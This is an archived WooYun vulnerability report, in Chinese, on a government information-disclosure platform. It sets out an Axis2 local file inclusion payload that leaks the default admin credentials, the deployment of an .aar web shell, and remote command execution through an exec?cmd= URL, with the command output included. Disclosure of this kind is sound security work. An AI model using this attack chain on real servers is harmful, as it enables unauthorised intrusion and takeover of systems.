某政府信息公开统一平台存在本地文件包含漏洞+远程命令执行、 | wooyun-2015-0146582

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0146582

漏洞标题：

某政府信息公开统一平台存在本地文件包含漏洞+远程命令执行、

漏洞详情

披露状态：

2015-10-14：细节已通知厂商并且等待厂商处理中
2015-10-18：厂商已经确认，细节仅向厂商公开
2015-10-28：细节向核心白帽子及相关领域专家公开
2015-11-07：细节向普通白帽子公开
2015-11-17：细节向实习白帽子公开
2015-12-02：细节向公众公开

简要描述：

某政府信息公开统一平台存在本地文件包含漏洞+远程命令执行、

详细说明：

http://**.**.**.**:8080/govinfo/index.htm
**.**.**.**:8080/govinfo/index.htm
两个都存在本地文件包含漏洞、

比如：**.**.**.**:8080/axis2/services/Version?xsd=../conf/axis2.xml

<parameter name="DrillDownToRootCauseForFaultReason">false</parameter><parameter name="userName">admin</parameter><parameter name="password">axis2</parameter>

得到AXIS2口令、登录后台
部署 aar shell、

**.**.**.**:8080/axis2/services/Cat

本地信息;

**.**.**.**:8080/axis2/axis2-web/HappyAxis.jsp

漏洞证明：

漏洞证明当前路劲、

/D:/Program%20Files/Apache%20Software%20Foundation/Tomcat%206.0/webapps/axis2/WEB-INF/classes/

执行远程命令、
**.**.**.**:8080/axis2/services/Cat/exec?cmd=whoami

\\WINDOWS-TV142ZI 的用户帐户
-------------------------------------------------------------------------------
Administrator            Guest                    
命令成功完成。

接口: **.**.**.** --- 0xb
  Internet 地址         物理地址              类型
  **.**.**.**          40-f2-e9-1c-d7-f0     动态      
  **.**.**.**1         00-30-48-f2-66-79     动态      
  **.**.**.**4         3c-e5-a6-51-b4-68     动态      
  **.**.**.**5         ff-ff-ff-ff-ff-ff     静态      
  **.**.**.**            01-00-5e-00-00-16     静态      
  **.**.**.**           01-00-5e-00-00-fc     静态      
  **.**.**.**       ff-ff-ff-ff-ff-ff     静态

OK、

修复方案：

删除aar木马、
1、axis2升级到最高版本。
2、修复axis_local_file_include漏洞

版权声明：转载请注明来源 Weiy、@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-10-18 22:50

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT下发给广西分中心,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Weiy、@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Weiy、@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞